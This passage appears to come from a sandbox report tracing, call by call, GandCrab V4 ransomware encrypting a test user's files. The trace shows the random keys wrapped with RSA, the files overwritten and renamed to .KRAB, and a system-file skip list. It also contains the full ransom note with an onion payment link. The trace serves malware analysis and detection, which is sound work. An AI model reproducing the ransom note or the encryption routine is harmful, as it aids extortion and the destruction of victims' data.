lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0057.707] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0057.707] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0057.708] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ea7c*=0x31000, lpOverlapped=0x0) returned 1 [0057.773] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfffcf000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.773] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x31000, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ea78*=0x31000, lpOverlapped=0x0) returned 1 [0057.773] WriteFile (in: hFile=0x440, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0057.774] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.778] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.779] CloseHandle (hObject=0x440) returned 1 [0057.785] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.786] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\access\\accesscache.accdb"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\access\\accesscache.accdb.krab")) returned 1 [0057.786] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.787] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.787] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.787] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.787] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\d2ca4a08d2ca4dee3d.lock" [0057.787] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.787] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 83 [0057.788] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\d2ca4a08d2ca4dee3d.lock") returned 78 [0057.788] lstrlenW (lpString=".lock") returned 5 [0057.788] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.788] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.788] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.788] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.788] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.788] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0057.788] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0057.788] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\KRAB-DECRYPT.txt" [0057.788] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.789] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\KRAB-DECRYPT.txt.KRAB") returned 76 [0057.789] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\KRAB-DECRYPT.txt") returned 71 [0057.789] lstrlenW (lpString=".txt") returned 4 [0057.789] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.789] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0057.789] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.789] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\KRAB-DECRYPT.txt") returned 71 [0057.789] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\KRAB-DECRYPT.txt") returned 71 [0057.789] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0057.789] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0057.789] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0057.790] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0057.790] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0057.790] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0057.790] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0057.790] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0057.790] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0057.790] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0057.790] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.790] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.790] lstrcmpW (lpString1="System.mdw", lpString2=".") returned 1 [0057.790] lstrcmpW (lpString1="System.mdw", lpString2="..") returned 1 [0057.790] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\", lpString2="System.mdw" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw" [0057.790] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.790] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw.KRAB") returned 70 [0057.790] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw") returned 65 [0057.790] lstrlenW (lpString=".mdw") returned 4 [0057.790] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.791] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".mdw ") returned 5 [0057.791] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.791] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw") returned 65 [0057.791] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw") returned 65 [0057.791] lstrcmpiW (lpString1="System.mdw", lpString2="desktop.ini") returned 1 [0057.791] lstrcmpiW (lpString1="System.mdw", lpString2="autorun.inf") returned 1 [0057.791] lstrcmpiW (lpString1="System.mdw", lpString2="ntuser.dat") returned 1 [0057.791] lstrcmpiW (lpString1="System.mdw", lpString2="iconcache.db") returned 1 [0057.791] lstrcmpiW (lpString1="System.mdw", lpString2="bootsect.bak") returned 1 [0057.791] lstrcmpiW (lpString1="System.mdw", lpString2="boot.ini") returned 1 [0057.791] lstrcmpiW (lpString1="System.mdw", lpString2="ntuser.dat.log") returned 1 [0057.791] lstrcmpiW (lpString1="System.mdw", lpString2="thumbs.db") returned -1 [0057.791] lstrcmpiW (lpString1="System.mdw", lpString2="KRAB-DECRYPT.html") returned 1 [0057.791] lstrcmpiW (lpString1="System.mdw", lpString2="KRAB-DECRYPT.txt") returned 1 [0057.791] lstrcmpiW (lpString1="System.mdw", lpString2="CRAB-DECRYPT.txt") returned 1 [0057.791] lstrcmpiW (lpString1="System.mdw", lpString2="ntldr") returned 1 [0057.791] lstrcmpiW (lpString1="System.mdw", lpString2="NTDETECT.COM") returned 1 [0057.791] lstrcmpiW (lpString1="System.mdw", lpString2="Bootfont.bin") returned 1 [0057.791] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.792] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbbbb0) returned 1 [0057.792] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.793] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.793] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.793] CryptGenRandom (in: hProv=0xfbbbb0, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0057.793] CryptReleaseContext (hProv=0xfbbbb0, dwFlags=0x0) returned 1 [0057.793] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.793] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbb5d8) returned 1 [0057.794] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.794] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.794] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.794] CryptGenRandom (in: hProv=0xfbb5d8, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0057.794] CryptReleaseContext (hProv=0xfbb5d8, dwFlags=0x0) returned 1 [0057.794] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.795] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbba18) returned 1 [0057.795] CryptImportKey (in: hProv=0xfbba18, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd1e0) returned 1 [0057.797] CryptGetKeyParam (in: hKey=0xfbd1e0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0057.797] CryptEncrypt (in: hKey=0xfbd1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0057.798] GetLastError () returned 0x0 [0057.798] CryptDestroyKey (hKey=0xfbd1e0) returned 1 [0057.798] CryptReleaseContext (hProv=0xfbba18, dwFlags=0x0) returned 1 [0057.798] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbb990) returned 1 [0057.798] CryptImportKey (in: hProv=0xfbb990, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd1e0) returned 1 [0057.798] CryptGetKeyParam (in: hKey=0xfbd1e0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0057.798] CryptEncrypt (in: hKey=0xfbd1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0057.799] GetLastError () returned 0x0 [0057.799] CryptDestroyKey (hKey=0xfbd1e0) returned 1 [0057.799] CryptReleaseContext (hProv=0xfbb990, dwFlags=0x0) returned 1 [0057.799] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\access\\system.mdw"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0057.799] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0057.799] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0057.800] ReadFile (in: hFile=0x440, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ea7c*=0x1f000, lpOverlapped=0x0) returned 1 [0057.830] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0xfffe1000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.830] WriteFile (in: hFile=0x440, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x1f000, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ea78*=0x1f000, lpOverlapped=0x0) returned 1 [0057.830] WriteFile (in: hFile=0x440, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0057.835] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.840] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.840] CloseHandle (hObject=0x440) returned 1 [0057.845] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.846] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\access\\system.mdw"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\System.mdw.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\access\\system.mdw.krab")) returned 1 [0057.846] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.847] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0057.847] FindClose (in: hFindFile=0xfbd5a0 | out: hFindFile=0xfbd5a0) returned 1 [0057.847] CloseHandle (hObject=0x3ac) returned 1 [0057.847] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0057.847] lstrcmpW (lpString1="AddIns", lpString2=".") returned 1 [0057.847] lstrcmpW (lpString1="AddIns", lpString2="..") returned 1 [0057.847] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="AddIns" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns" [0057.847] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\" [0057.847] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0057.847] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.847] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.848] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.848] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.848] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.848] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.848] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\\\KRAB-DECRYPT.txt") returned 72 [0057.848] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\addins\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0057.862] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.862] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.863] CloseHandle (hObject=0x3ac) returned 1 [0057.863] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.863] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.863] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x5, wMilliseconds=0x3d)) [0057.864] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.864] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.864] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.864] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\d2ca4a08d2ca4dee3d.lock") returned 78 [0057.864] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\addins\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0057.864] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.865] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.865] lstrlenW 